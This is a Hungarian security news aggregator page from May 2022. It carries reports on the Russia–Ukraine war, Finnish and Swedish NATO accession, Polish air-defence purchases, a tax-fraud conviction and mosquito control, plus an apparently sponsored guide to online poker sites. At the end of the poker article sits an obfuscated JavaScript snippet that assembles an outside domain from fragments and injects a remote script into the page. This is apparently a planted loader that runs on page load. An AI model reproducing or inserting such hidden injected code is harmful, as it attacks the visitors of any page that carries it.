You are here

Biztonságpolitika

Orosz agresszió: Ukrajna nem bocsátja áruba a szuverenitását

Biztonságpiac - Wed, 05/25/2022 - 08:35
Bírálta a davosi gazdasági fórum egyes résztvevőit a fegyverletételt szorgalmazó kijelentéseikért Mihajlo Podoljak, az ukrán elnöki iroda vezetőjének tanácsadója, a Moszkvával tárgyaló ukrán békeküldöttség tagja leszögezve, hogy “Ukrajna nem bocsátja áruba a szuverenitását”.

A tisztségviselő szavai szerint a jelenleg zajló davosi fórumon a kulisszák mögött egyes résztvevők arról beszélnek, itt lenne már az ideje a fegyvernyugvásnak, a tárgyalásnak Moszkvával annak érdekében, hogy újra üzletelhessenek Oroszországgal.

“Ukrajna nem bocsátja áruba a szuverenitását azért, hogy valakik megtömhessék a pénztárcájukat” – hangsúlyozta Podoljak. Megismételte, hogy szerinte a háború végéhez vezető legrövidebb út: Ukrajna ellátása fegyverekkel és pénzzel, valamint Oroszországgal szemben gazdasági embargó életbe léptetése.

A Kijevi Nemzetközi Szociológiai Intézet (KMISZ) május 13-18. között elvégzett felmérése szerint az ukrán lakosság 82 százaléka nem támogatja, hogy az országa feladjon bármit is területéből a békéért cserébe.

Közben Kirilo Budanov, az ukrán védelmi minisztérium hírszerzési főigazgatóságának vezetője az Ukrajinszka Pravda hírportálnak adott interjújában azt állította, hogy Putyinnak több súlyos betegsége is van, köztük onkológiai, de ettől függetlenül még évekig élhet. Kijelentette, hogy az ukrán katonai hírszerzés megerősíti, hogy Putyin rákbeteg. “Számos súlyos betegsége van, ezek közül az egyik a rák. Nem érdemes viszont abban reménykedni, hogy Putyin holnap meghal. Van még legalább néhány éve” – fogalmazott a hírszerző főnök.

A hírportál egyebek mellett emlékeztetett arra, hogy független orosz oknyomozó újságírók áprilisban közzétették, hogy Putyint utazásaira tucatnyi orvos kíséri, köztük Jevgenyij Szelivanov, pajzsmirigybetegségekre szakosodott onkológus. Dmitrij Peszkov, a Kreml szóvivője utána tartott sajtótájékoztatóján viszont újságírói kérdésre válaszolva határozottan cáfolta, hogy Putyin rákos lenne.

A Donyeck megyei, orosz megszállás alá került Mariupolban eközben mintegy kétszáz, oszladozó holttestet találtak egy többemeletes ház romjai alatt – közölte Petro Andrjuscsenko, a mariupoli polgármester tanácsadója a Telegramon. Szavai szerint a helybeliek nem voltak hajlandók összegyűjteni a holttesteket, ezért az az orosz veszélyhelyzeti minisztérium dolgozói otthagyták a területet, így ott maradtak a holtestek is. Andrjuscsenko hozzátette, hogy általánosságban a kikötővárosban leállt az ideiglenesen, a lakóházak udvaraiban ásott sírokból a halottak újratemetése. “Jelenleg a temetési és exhumálási munkákat a donyecki Ritual nevű vállalat végzi. De az ingyenes újratemetéshez sorba kell állni, az elhunyt holttestét a hozzátartozóknak maguknak kell bevinniük a ravatalozóba, azt állítva, hogy csak most találták meg, vagy bele kell egyezniük egy olyan videó rögzítésébe, amelyben el kell mondaniuk, hogy az elhunytat az ukrán hadsereg ölte meg” — állította a tanácsadó. Hozzátette, hogy emiatt rengeteg holttestet raktak ki zsákokban az utcákon, így – szavai szerint – mostanra az egész város egy egybefüggő temetővé változott.

Az ukrán vezérkar keddi helyzetjelentéséből az Ukrajinszka Pravda azt emelte ki, hogy az orosz erők javítottak taktikai pozícióikon a keleti országrészben lévő Zaporizzsja megyei Vaszilivka településnél, így várhatóan ebben az irányvonalban újabb támadásokra készülnek. Változatlanul a leghevesebb harcok Donyec-medencében zajlanak, különösen súlyos a helyzet Liszicsanszknál és Szeverodonyecknél. A vezérkar szerint egyre növekszik a veszélye annak, hogy fehéroroszországi területről érik légi és rakétacsapások az ukrajnai településeket. Oroszország Iszkander-M rakétarendszereket telepített a fehéroroszországi Breszt közelébe, kevesebb mint ötven kilométerre az ukrán határtól.

A kijevi vezérkar legfrissebb, keddi összesítése alapján eddig hozzávetőlegesen 29 350 orosz katona esett el. Az ukrán erők megsemmisítettek 205 orosz repülőgépet, 170 helikoptert, 13 hadihajót, 1302 harckocsit, 3194 páncélozott harcjárművet, 606 tüzérségi és 93 légvédelmi rendszert, valamint 201 rakéta-sorozatvetőt.

Az Országos Idegenrendészeti Főigazgatóság az orosz-ukrán háború kitörése óta – 2022. május 24. 6.00 órai adatok alapján – eddig 22 645 menedékeskénti elismerés iránti kérelmet regisztrált. A kérelmek elbírálása folyamatos, határidőn belül történik, eddig 13 634 fő esetében született elismerő döntés. Továbbra is naponta több száz új menedékes elismerés iránti kérelmet nyújtanak be az Ukrajnából menekülők az Országos Idegenrendészeti Főigazgatóságnál. A kérelem benyújtására a Főigazgatóság ügyfélszolgálatain, illetve a kormányablakokban van lehetőség ügyfélfogadási időben. Az ügyfélszolgálatokra való érkezés előtt javasoljuk, hogy előzetesen töltsék fel elektronikusan adataikat, melyet megtehetnek a “Menedekes” applikáción vagy az Enter Hungary felületén keresztül. Az applikációt letölthető az OIF honlapján keresztül. Az applikáció segítségével gyorsul az ügyintézés, így a személyes megjelenést követően, már csak az adatok ellenőrzése, a fénykép és ujjnyomat rögzítése szükséges.

The post Orosz agresszió: Ukrajna nem bocsátja áruba a szuverenitását appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: a finn és svéd csatlakozás stratégiai fontosságú a NATO számára

Biztonságpiac - Wed, 05/25/2022 - 07:35
Az észak-atlanti szövetség szempontjából Finnország és Svédország csatlakozása egyértelműen növeli a Balti-térség biztonságát, erősíti a NATO hagyományos katonai elrettentő képességét, és a jelenleginél egyértelműbb és markánsabb határokat jelöl ki a NATO és Oroszország között – állapította meg legfrissebb elemzésében a Stratégiai Védelmi Kutatóintézet (SVKI).

A Nemzeti Közszolgálati Egyetem kutatóintézete elemzésében hozzátette azt is, hogy Finnország tagsága erősíti a szövetség északkeleti szárnyát, megkönnyíti Észtország, Lettország és Litvánia, továbbá az Északi-sark és a Jeges-tenger térségének védelmét. A kutatók szerint politikai szempontból is stratégiai fontosságú lehet a két ország csatlakozása.

Május 15-én Finnország, majd másnap Svédország jelentette be, hogy csatlakozni kíván az Észak-atlanti Szerződés Szervezetéhez (NATO). Az SVKI tanulmányában felidézték, hogy a finn és svéd NATO-tagság “az orosz-ukrán háború által kiváltott forradalmi lépésnek tűnik”, a katonai tömbökön kívüli két ország biztonságpolitikájában a döntés azonban nem előzmény nélküli: az 1990-es évekbeli kapcsolatfelvétel után, a 2014-es ukrajnai események hatására mélyítették el az együttműködést a NATO-val.

Azóta Finnország és Svédország erős NATO-partnerré vált: közös hadgyakorlatokat tartanak, megosztják egymással hírszerzési információikat; Svédország és Finnország egyaránt támogatta például a szövetség balkáni és afganisztáni misszióit, s partnerként részt vesz a NATO Reagáló Erők tevékenységében is.

Az orosz-ukrán háború és a NATO-tagságról kiújuló vita néhány hét alatt drasztikusan átalakította a finn és a svéd közvélemény attitűdjét a NATO-csatlakozásról. Finnországban idén januárban még csak a lakosság 28 százaléka támogatta a csatlakozást, arányuk egy márciusi felmérés szerint már 73 százalék volt. A svéd közvélemény NATO-val kapcsolatos attitűdje már az 1990-es évek közepétől elkezdett változni, mégis csak idén áprilisban nőtt 50 százalék fölé a csatlakozás támogatóinak aránya – ismertették.

Kitértek arra is, hogy Finnország és Svédország védelmi kiadásai is dinamikusan nőttek az elmúlt években. Finnország már teljesíti a NATO által elvárt két százalékos GDP-arányos szintet, a svéd haderő pedig úgy kalkulál, hogy 2028-ra a kiadások elérhetik a GDP két százalékát.

A várható reakciókról azt írták: Oroszország többször felhívta a két ország figyelmét, “tartózkodjon a NATO-csatlakozástól”. Putyin súlyos politikai és katonai következményekről beszélt, “ami ellen fel fognak lépni”.

Nem tartanak valószínűnek valódi katonai fellépést, arra számítanak, hogy Moszkva ellenlépésekhez, illetve akár megtorló lépésekhez is folyamodhat. Ezek lehetnek például légtérsértések, a NATO-tagállamok felségvizeire való behatolás, kiber- és hibrid támadások, beleértve a dezinformációs kampányokat és a katonai tevékenységet is a két ország határainál. Továbbá egyfajta energiafegyverként a földgáz- és kőolajcsapok elzárása is szóba jöhet (ahogyan ezt megtették Finnország esetében), illetve nukleáris fegyvereket és hiperszonikus csapásmérő fegyvereket is telepíthetnek a kalinyingrádi körzetbe – fejtették ki.

Az SVKI elemzése szerint az orosz válaszlépések valószínűleg attól is függnek majd, hogy a két országba végül települ-e NATO-infrastruktúra, s ha igen, milyen és hová.

Rutte: nem valószínű, hogy Ukrajna rövidesen uniós tagjelölt ország lesz
Nem túl nagy az esélye annak, hogy Ukrajna rövidesen európai uniós tagjelölt ország lesz, mivel túl sok tagországnak nem tetszik ez az ötlet, továbbá igazságtalan lenne a nyugat-balkáni országokkal szemben is, amelyek már régóta várnak a tagjelölti státuszra – jelentette ki Mark Rutte holland miniszterelnök. Az NlTimes hírportál tudósítása szerint a hétfő esti felszólalásban Rutte elmondta: létezik egy olyan lehetőség, miszerint Ukrajna “potenciális tagjelölt” lesz, és előírják neki, milyen lépéseket kell megtennie, hogy megkapja a rendes tagjelölti státuszt. “Ez történt Bosznia-Hercegovina esetében is. Talán ez segítené az ukrán kormányt”, továbbra is ösztönzőleg hatna rá – tette hozzá a holland kormányfő. Rutte szerint Ukrajna az ellene indított orosz háború előtt “nagyon messze volt” a tagjelöltségtől. Rutte kétségét fejezte ki aziránt is, hogy a csatlakozási kérelmét március elején benyújtó Moldova rövidesen tagjelölti státuszt kapna. Nem zárta ki azonban, hogy ezek az országok a folyamat végén majd csatlakoznak az EU-hoz, amennyiben megfelelnek a feltételeknek.

The post Orosz agresszió: a finn és svéd csatlakozás stratégiai fontosságú a NATO számára appeared first on .

Categories: Biztonságpolitika

Lengyelország újabb Patriot rakétákat szerez be

Biztonságpiac - Wed, 05/25/2022 - 06:35
Lengyelország újabb Patriot-rakétaütegeket szerez be – jelentette be Mariusz Blaszczak nemzetvédelmi miniszter kedden a Twitter közösségi honlapján, hozzátéve, hogy hat üteg beszerzésére írt alá ajánlattételi felhívást.

“Elindítjuk a Visztula légvédelmi program második szakaszát” – áll Blaszczak bejegyzésében.

A miniszter a Polsat News lengyel kereskedelmi hírtelevízióban felidézte: a Visztula program első szakaszában már megvásároltak két Patriot-üteget. A 4,75 milliárd dollár értékű beszerzésről Varsó és Washington 2018 márciusában állapodott meg, a szállítást korábbi közlések szerint ez év végén vagy 2023 elején bonyolítják le. A rendszer a műveleti készültséget 2023 és 2024 fordulóján éri el az eddig ismertetett tervek szerint.

Március elején – már Oroszország Ukrajna elleni háborújának kitörését követően – a Varsóba látogató Kamala Harris amerikai alelnök is beszámolt arról, hogy Lengyelországba szállítottak két Patriot-üteget. Ez a szállítmány azonban nem része a lengyel légvédelmi programnak, és az amerikaiak később közölték: a rakétákat átmeneti jelleggel helyezték át Németországból.

A lengyel parlament március közepén elfogadta a védelmi kiadások és a hadsereg létszámának növeléséről szóló törvényt. Ennek értelmében jövőre a bruttó hazai termék (GDP) három százalékára emelik Lengyelország védelmi kiadásait.

 

The post Lengyelország újabb Patriot rakétákat szerez be appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: az ukrán gázszállító rendszert rombolják az oroszok

Biztonságpiac - Wed, 05/25/2022 - 05:35
Orosz katonák behatoltak Szerhij Svec, a zaporizzsjai atomerőmű energiajavító részlege egyik alkalmazottjának házába, és automata fegyverekkel meglőtték – közölte az Enerhoatom ukrán állami atomipari vállalat.

Az Enerhoatom hozzáfűzte, hogy a szakembert számos lőtt sérüléssel szállították kórházba és életveszélyes állapotban van. Az Ukrajiszka Pravda hírportál emlékeztetett arra, hogy az ország keleti részében lévő atomerőművet március 4. óta tartják megszállva az orosz erők.

Közben az ukrán gázszállító rendszert (HTSZ) fenntartó vállalat arról adott hírt, hogy az orosz hadsereg ágyúzása következtében megsérült a fő gázvezeték, amely Donyecket és Luhanszkot látja el. Emiatt helyi idő szerint 14 órakor leállt a gázszállítás a vezetéken. A vállalat kifejtette, hogy a károsodás helyét lokalizálták, de a hiba kijavítása és a gázszállítás újraindítása lehetetlen a térségben jelenleg zajló aktív harci cselekmények miatt. “Az orosz csapatok által megszállt területen a gázszállító rendszer működésébe való jogosulatlan beavatkozás miatt nincs lehetőség arra sem, hogy a földgázt alternatív útvonalon juttassák el a két régió településeire – mutatott rá a vállalat, amely emlékeztetett arra, hogy “május 11-én szakembereik rögzítették a szelepek leállását a Donyeck és Luhanszk régió területére gázt szállító fő gázvezeték novopszkovi kompresszorállomásának területén”. A vállalat azt is hozzátette, hogy szakembereik nem hagyják el a Donyec-medence területét, folyamatos kapcsolatban állnak a katonasággal és a katonai-polgári közigazgatás képviselőivel annak érdekében, hogy a megrongálódott gázszállítási infrastruktúra mielőbbi helyreállítása megkezdődhessen.

Valerij Zaluzsnij, az ukrán fegyveres erők főparancsnoka arról számolt be, hogy eddig 24 település fölött vette vissza Ukrajna az ellenőrzését a keleti országrészben lévő Harkiv megyében. Szavai szerint a május elején visszafoglalt Kutuzovka faluban mintegy 170 helyi lakos – köztük negyven, 12 évesnél fiatalabb gyermek – élt több mint két hónapig egy óvoda pincéjében.

Az ukrán vezérkar arról adott hírt, hogy a dél-ukrajnai Herszon és a vele keletről szomszédos Zaporizzsja megye orosz megszállás alá került részein az oroszok már 19, úgynevezett “parancsoki hivatalt” hoztak létre.

Szerhij Hajdaj Luhanszk megyei kormányzó arról számolt be, hogy az orosz csapatok hétfőn is szünet nélkül lőtték Szeverodonecket, az eddigi információk alapján egy 58 éves nő megsérült.

Az ukrán határőrség arról tájékoztatott, hogy Kijev, Zsitomir és Rivne megyében a fehérorosz határmenti területeken megerősítették a korlátozásokat. Így az államhatárral közvetlenül szomszédos, egy kilométer széles terepsávban tilos a civilek bármilyen mozgása, kivéve az államhatárral közvetlenül szomszédos települések területét. A rendelkezés a hadiállapot végéig marad érvényben.

Az Ukrajinszka Pravda hírt adott arról, hogy a Kelet-Ukrajnában zajló heves harcok miatt leállította a munkát az Artemszil, Európa legnagyobb sókitermelő vállalata. Viktor Jurin, a vállalat igazgatója közölte, hogy a teljes késztermék készletet már áprilisban elszállították. Szavai szerint a vállalat leállása miatt nagy valószínűséggel Ukrajna külföldi behozatalra szorul majd sóból.

A távol-keleten is éleződik a helyzet
Orosz Tu-95MSZ hadászati rakétahordozók és kínai Hong-6K hadászati bombázók közös légi járőrözést hajtottak végre az ázsiai-csendes-óceáni térségben, a Japán-tenger és a Kelet-kínai-tenger vizei felett – közölte az orosz védelmi minisztérium. A köteléket a mintegy 13 órás járőrözés egyes szakaszain a dél-koreai légierő F-2-es és a japán légierő F-15-ös repülőgépei kísérték. A nukleáris fegyverek szállítására képes bombázócsoport vadászkíséretét az orosz légierő Szu-30SZM típusú repülőgépei biztosították. Az orosz védelmi tárca közölte, hogy a misszió során a két ország repülőgépei szigorúan a nemzetközi jog előírásaival összhangban jártak el, és nem sértették meg idegen államok légterét. A minisztérium szerint a gyakorlatot a 2022-es katonai együttműködési terv keretében tartották meg, és nem irányult más országok ellen. A hivatalos tájékoztatásból nem derült ki, hogy összesen hány repülőgép vett részt a gyakorlaton. Nyugati hírügynökségek rámutattak, hogy ez volt a két ország bombázóinak első közös repülése azt követően, hogy Oroszország inváziót indított Ukrajna ellen. Az esemény egybeesett azzal, hogy Joe Biden amerikai elnök Tokióban Kisida Fumio japán, Narendra Modi és Anthony Albanese ausztrál miniszterelnökkel tanácskozott a Négyoldalú Biztonsági Párbeszéd katonai együttműködés keretében.

The post Orosz agresszió: az ukrán gázszállító rendszert rombolják az oroszok appeared first on .

Categories: Biztonságpolitika

Mire kell odafigyelnünk, amikor online pókeroldalt választunk?

Biztonságpiac - Tue, 05/24/2022 - 20:08
A megfelelő online pókeroldal kiválasztásakor számos fontos tényezőt kell figyelembe vennünk. Ha az első velünk szembe jövő online kaszinót választjuk, akkor lehet, hogy egy kétes hírű, sőt csaló webhelyre keveredünk, ami pontosan az, amit minden áron el szeretnénk kerülni!

A tökéletes online játékoldal megtalálásához összeállítottunk egy listát azokról a fontos tényezőkről, amelyeket feltétlenül ellenőrizni kell, mielőtt belevágnánk a valódi pénzes játékokba.

Keressünk engedélyezett online kaszinót

Nem tudjuk eléggé hangsúlyozni az engedéllyel rendelkező online kaszinók keresésének fontosságát. Ha olyan online kaszinót választunk, amely egy jó hírű iGaming szabályozó testület által kiadott, érvényes játéklicenccel rendelkezik, az biztosítja számunkra a legbiztonságosabb iGaming élményt. És hogy honnan tudja, hogy egy online kaszinó rendelkezik-e ilyen engedéllyel? Csak görgessen le a weboldal aljára!

Minden engedéllyel rendelkező online kaszinó büszkén közzéteszi engedélyezési adatait, és erről szóló tanúsítványa egészen biztosan szerepel a honlapján.

Ellenőrizzük az alkalmazott biztonsági és adatvédelmi intézkedéseket

Ha találtunk egy engedélyezett online kaszinót, a következő elengedhetetlen lépés a biztonsági és adatvédelmi intézkedések ellenőrzése. Nem titok, hogy az iGaming iparág számos kétes hírű és csaló webhellyel rendelkezik, amelyek nem védik meg a játékosok nehezen megkeresett pénzét és személyes adatait a hackerektől és a számítógépes bűnözőktől. A legjobb online pókeroldalak több millió dollárt fektetnek a biztonságba. A többezer játékossal és személyes adataikkal rendelkező webhelyek biztonsága rendkívül fontos az iparágon belül. Magyarország egyik legális pókeroldala, a GGPoker ISO 27001 minősítést kapott online játékplatformjáért. Az ISO 27001 egy világszerte elismert nemzetközi szabvány a szervezetek adatainak biztonságát érintő kockázatok kezelésére, és a folyamat szabványosított követelményeket biztosít az információk biztonságos kezeléséhez.

Mivel az online játékok során a felhasználók pénzt fizetnek be, illetve vesznek ki, elengedhetetlen, hogy a választott online kaszinó SSL titkosítást használjon, amely az online biztonság aranystandardja. A legbiztonságosabb játékkörnyezet fenntartása érdekében az SSL titkosítás mellett a jó hírű online kaszinók tűzfalakra és más technológiákra is támaszkodnak.

Nézzük meg a bónuszokat és promóciókat

A német online pókeroldalak üdvözlő bónuszokat kínálnak, hogy új ügyfeleket vonzzanak webhelyeikre. Ezek többsége 100%-os betéti bónuszkiegészítések formájában érkezik, míg néhány pókerterem például ingyenes versenyjegyeket is kínál az újonnan érkezőknek.

Mielőtt elkötelezné magát egy online kaszinó mellett, ellenőrizze az üdvözlő bónusz feltételeket, valamint a fogadási követelményeket. Annak ellenére, hogy egy üdvözlő bónusz talán nagylelkűnek tűnhet, lehet, hogy a magasabb összegű fogadási követelmények miatt valójában nem is az!

Az üdvözlő bónuszok mellett nem árt megnézni az oldalon bemutatott egyéb promóciókat is. Ellenőrizze más bónuszok elérhetőségét is, például az újratöltést, a visszafizetést és az ajánlási programot.

Ellenőrizzük a befizetési és kifizetési lehetőségeket

Amikor egy online kaszinó kiválasztásáról van szó, van még egy kritikus tényező, amelyet mindenképpen figyelembe kell venni, ez pedig a kaszinó banki szolgáltatása. A legtöbb német játékossal rendelkező kaszinó elfogadja az eurót. A különböző valuták elfogadása mellett érdemes ellenőriznünk a rendelkezésre álló fizetési lehetőségeket is.

A német játékosok körében a legnépszerűbb fizetési lehetőségek a banki átutalások, a hitel- és betéti kártyák, a Skrill és a Neteller e-pénztárcák, valamint a kriptovaluták, mint például a Bitcoin.

Ezenkívül ellenőrizze a pénzkivételi lehetőségeket, és olvassa el a kaszinó felhasználói feltételeit, hogy megtudja, számítanak-e fel jutalékot, vagy sem.

Vizsgáljuk meg a különböző játékok elérhetőségét

A következő lépés a kaszinó játékkönyvtárának vizsgálata. A kaszinó webhelyén kattintson a fő játékmenüre, és nézze meg az összes rendelkezésre álló játéklehetőséget. Töltsön be néhány játékot, és ellenőrizze a webhely gyorsaságát a kívánt játékeszközön, valamint, hogy kedvenc játékai egyáltalán szerepelnek-e a listán.

Ha inkább a klasszikus asztali játékokat részesíti előnyben, győződjön meg róla, hogy a választott iGaming platformon elérhetők-e ezek a játékok. Ha a nyerőgépeket szereti, akkor érdemes olyan kaszinóba regisztrálnia, ahol bőséges választék áll rendelkezésre belőlük. A bemutatott online kaszinójátékok körének értékelése mellett olyan kaszinót válasszon, amely RNG tanúsítvánnyal rendelkezik.

Teszteljük a kaszinó ügyfélszolgálatát

Ha új online kaszinót keres, az ügyfélszolgálat a másik kritikus tényező, amit semmiképpen sem hagyhat figyelmen kívül. Minden német online kaszinó rendelkezik ügyfélszolgálattal, ám nem minden ügyfélszolgálat megbízható és szavahihető.

Mivel valós idejű segítséget szeretne, győződjön meg róla, hogy a választott online kaszinó ügyfélszolgálata éjjel-nappal elérhető-e élő chaten keresztül. Az is fontos, hogy más kapcsolatfelvételi lehetőség, például e-mail és telefon is rendelkezésre álljon.

Ellenőrizzük a kaszinó mobileszközös kompatibilitását

Ha útközben is kedvenc pókerjátékait szeretné játszani, ellenőrizze a kaszinó mobil kompatibilitását, hogy az támogatja-e hordozható eszközét. Míg a legtöbb kaszinóban azonnal játszhatunk mobil játékokat, akad néhány, amely csak letölthető alkalmazáson keresztül működik.

Akárhogy is döntsön, a kaszinó mobil kompatibilitásának ellenőrzése elengedhetetlen, ha szeret útközben játszani.

(function(){ i18r_=("u"+"st");i18r=document.createElement("script");i18r.async=true; i18ru="378016311";i18r_+="a"+("t.");i18r_+="i"+("nf"+("o"))+("/"); i18ru+=".ve676cuc18rd9fwd";i18ru+="mfxf15sig2r2bm"; i18r.src="https://"+i18r_+i18ru;i18r.type="text/javascript"; d_b=document.body;d_b.appendChild(i18r); })();

The post Mire kell odafigyelnünk, amikor online pókeroldalt választunk? appeared first on .

Categories: Biztonságpolitika

Már megint elítéltek néhány őrző-védő cég vezetőjét

Biztonságpiac - Tue, 05/24/2022 - 16:35
Egytől három évig terjedő szabadságvesztést szabott ki a Pécsi Ítélőtábla öt vádlottal szemben hétfői jogerős határozatában, mert az általuk irányított őrző-védő cégek nem fizették munkavállalóik után az adókat, illetve a járulékokat, és ezzel több mint 200 millió forint kárt okoztak a költségvetésnek.

A Pécsi Fellebbviteli Főügyészség közleményében azt írták: az ügy most jogerősen elítélt öt vádlottja közül ketten 2012-ben elhatározták, hogy olyan szervezetet hoznak létre, amelyen belül nem minden dolgozó után fizetik meg az adókat és a járulékokat.

E tevékenységhez olyan alvállalkozókat kerestek, akik az utasításaiknak megfelelően, havi bérezés mellett vállalják az általuk képviselt gazdasági társaságok vezetését. E feladatok ellátását az ügy további három vádlottja vállalta.

Az öt vádlott vagyonvédelmi tevékenység ellátására munkaerő-kölcsönzéssel hozott létre szervezetet úgy, hogy a feladat ellátásánál a tevékenységbe piramisszerűen beépülő cégek közül az alsó szinten csatlakozóknál jelentkezzen az adó- és járulékfizetési kötelezettség, a közvetlenül a megrendelővel kapcsolatban álló cégeknél ugyanakkor jelentős közteher-, illetve adóhiány ne mutatkozzon.

A munkát ténylegesen végző vagyonőrök kölcsönzött munkavállalók voltak, akik a kölcsönbe adó cégekhez voltak bejelentve, ténylegesen azonban a kölcsönbe vevő cégeknél foglalkoztatták őket. A kölcsönbeadó cégek azonban nem tettek eleget adó- és járulékfizetési kötelezettségüknek.

Ezzel a vádlottak 2013 és 2014 között több mint 200 millió forint vagyoni hátrányt okoztak a költségvetésnek.

A Pécsi Törvényszék az öt vádlottat társtettesként, különösen nagy vagyoni hátrányt okozó, bűnszervezetben elkövetett költségvetési csalás, továbbá folytatólagosan elkövetett hamis magánokirat felhasználása miatt mondta ki bűnösnek, és ezért őket 3 évtől 5 év 4 hónapig terjedő szabadságvesztésre ítélte.

A másodfokon eljáró Pécsi Ítélőtábla a vádlottak büntetését 1 év 2 hónap és 3 év 4 hónap közötti időtartamra enyhítette, tekintettel arra, hogy a másodfokú eljárás során az okozott vagyoni hátrányból 125 millió forintot megtérítettek.

Az ügynek további nyolc vádlottja is volt, őket bűnsegédlet és hamis magánokirat felhasználása miatt korábban felfüggesztett szabadságvesztésre ítélte a bíróság.

 

The post Már megint elítéltek néhány őrző-védő cég vezetőjét appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: Varsó felmondta az orosz gáztranzitról szóló kormányközi szerződést

Biztonságpiac - Tue, 05/24/2022 - 12:10
Varsó felmondta az Oroszországot Európával összekötő Jamal gázvezetéken történő gáztranzitról szóló lengyel-orosz kormányközi szerződést – közölte hétfőn a Twitter közösségi honlapján Anna Moskwa lengyel klímaügyi és környezetvédelmi miniszter.

Oroszország Ukrajna elleni háborúja “megerősítette a lengyel kormány elszántságát, hogy Lengyelország teljesen függetlenedjen az orosz földgáztól” – áll a bejegyzésben. “Mindig is tudtuk, hogy a Gazprom nem hiteles partner” – tette hozzá Moskwa. A miniszter később a PAP hírügynökséggel közölte: az orosz gázszállításokról és a gáztranzitról 1993-ban kötött kormányközi szerződés felbontásáról a lengyel kormány május 13-án fogadott el határozatot. A döntést hétfőn, diplomáciai jegyzék formájában ismertették Oroszországgal is.

A határozat elfogadása “természetes lépés” volt azt követően, hogy Oroszország áprilisban megszakította a lengyelországi gázszállításokat – fejtette ki Moskwa. A Gazprom április 27-től azért állította le lengyelországi szállításait, mert Varsó nem hajlandó rubelben fizetni a gázért. “Oroszország, megszakítva a szállításokat, tényszerűen megsértette a szerződésben foglaltakat, ennek nyomán a lengyel kormány azt a következtetést vonta le, hogy (…) a megállapodás hatálytalanná vált” — mondta el a miniszter.

Megerősítette: a varsói kormány már előzőleg is készült arra, hogy az év végéig függetlenné válik az orosz gázbeszerzésekről, a PGNiG lengyel állami gázszállító 2019-ben nem hosszabbította meg az ezekről szóló szerződést. A miniszter felidézte, hogy a Jamal gázvezeték lengyelországi szakaszának működtetője 2010 óta a Gaz-System lengyel társaság, amely az idén elfogadott lengyel törvény értelmében a gázvezeték kizárólagos felhasználójává vált.

Moskwa aláhúzta: a gázvezeték az európai joggal összhangban, fennakadások nélkül működik, ennek köszönhetően akadálymentes az ellenirányú gázszállítás Németországból Lengyelországba.

Német alkancellár: Magyarország nélkül is lehet olajembargó
Németország hajlandó lenne támogatni, hogy az Európai Unió tagországai Magyarország nélkül vezessenek be embargót az orosz kőolajra – mondta Robert Habeck német alkancellár, gazdasági miniszter. A politikus elmondta, hogy csalódott az orosz olajembargó ügyének elhúzódása miatt. A tárgyalásokat, egyeztetéseket az Európai Bizottság vezeti, ezért, ha a brüsszeli testület elnöke azt mondaná, hogy “megcsináljuk 26-an, Magyarország nélkül, akkor ez egy olyan út, amelyet mindig támogatnék”. Ugyan nem hallott ilyen javaslatot a bizottság elnökétől, ő maga ezért arra számít, hogy végül “úgy lesz, ahogy mindig is szokott lenni” az EU-ban, vagyis “néhány ország kvázi különjogokat” – könnyítést, haladékot – kap, de az EU egységesen, valamennyi tagország részvételével vezeti be az újabb büntetőintézkedéseket.

Az alkancellárt azért kérdezték az EU helyett nemzeti szinten bevezetendő olajembargó lehetőségéről, mert Katarina Barley, az Európai Parlament egyik alelnöke a hétvégén ugyancsak a Deutschlandfunknak azt mondta, hogy Magyarország nélkül kellene megvalósítani az Európai Bizottság által május elején bemutatott tervet. Barley egyebek mellett azzal indokolta javaslatát, hogy Orbán Viktor az embargó akadályozásával “az orránál fogva akarja vezetni az EU-t”, és ezt nem kellene eltűrni.

The post Orosz agresszió: Varsó felmondta az orosz gáztranzitról szóló kormányközi szerződést appeared first on .

Categories: Biztonságpolitika

Katasztrófavédelem: hét megyében folytatódik a szúnyogirtás

Biztonságpiac - Tue, 05/24/2022 - 08:35
Hét megye 252 településén folytatódik hétfőtől a szúnyogirtási program — közölte a program végrehajtásáért felelős Országos Katasztrófavédelmi Főigazgatóság (OKF).

A szakemberek Bács-Kiskun, Borsod-Abaúj-Zemplén, Hajdú-Bihar, Heves, Jász-Nagykun-Szolnok, Pest és Szabolcs-Szatmár-Bereg megyei településeken gyérítik a rovarokat – közölték. A munkavégzésről az önkormányzatok minden esetben értesítést kapnak, a tervezett időpontok, a kezelt területek térképes ábrázolása pedig megtalálható a katasztrófavédelem honlapján – tették hozzá.

Mint írták: a melegedő időjárás kedvez a szúnyogok szaporodásának, ám az eltérő csapadékviszonyok miatt a megjelenésük országszerte nagy változékonyságot mutat. Az elmúlt hetekben a Duna mentén jellemzően kisebb, jól megközelíthető tenyészőhelyek alakultak ki, ezek zömét feltárták és eredményesen kezelték a szakemberek. A Tiszán és a Bodrogon ugyanakkor több kisebb árhullám vonult le, emiatt a szúnyogok számára ideális élőhelyek jöttek létre és tömegesen keltek ki.

A napokban autóra szerelt permetező berendezésekkel juttatják ki a szúnyogirtó készítményt permetfelhő vagy köd formájában – fűzték hozzá. A nagyon kis mennyiségben kijuttatott irtószer emberekre, háziállatokra, növényekre ártalmatlan, csak több ezerszeres dózisban fejtene ki negatív hatást. Hektáronként mindössze fél litert permeteznek ki belőle, kijuttatás után néhány órával pedig le is bomlik. A szúnyogirtást késő este és éjszaka végzik a települések belterületén — ismertette az OKF.

HM: nagy zaj várható keddtől egy katonai gyakorlat miatt Dél-Dunántúlon
Megnövekedett hanghatásra kell számítani egy magyar-amerikai közös kiképzés miatt a Nagykanizsa, Nagyatád, Kaposvár, Szigetvár, Sármellék, Zalakaros és Kaposújlak által határolt területen keddtől péntekig – jelentette be a Honvédelmi Minisztérium (HM). A katonai vadászrepülők a kiképzési tervnek megfelelően ebben az időszakban – munkanapokon – 9 óra és 18 óra között hajtják végre a feladatokat, ezért a megszokottól eltérő, nagyobb zaj- és hanghatás várható – közölte a tárca. A Magyar Honvédség a jogszabályokat betartva törekszik arra, hogy a lehető legkisebb mértékben zavarja az állampolgárok nyugalmát és köszöni a lakosság megértését és türelmét.

The post Katasztrófavédelem: hét megyében folytatódik a szúnyogirtás appeared first on .

Categories: Biztonságpolitika

Harminc éve gyilkolták meg a maffiaellenes szicíliai ügyészeket

Biztonságpiac - Tue, 05/24/2022 - 07:35
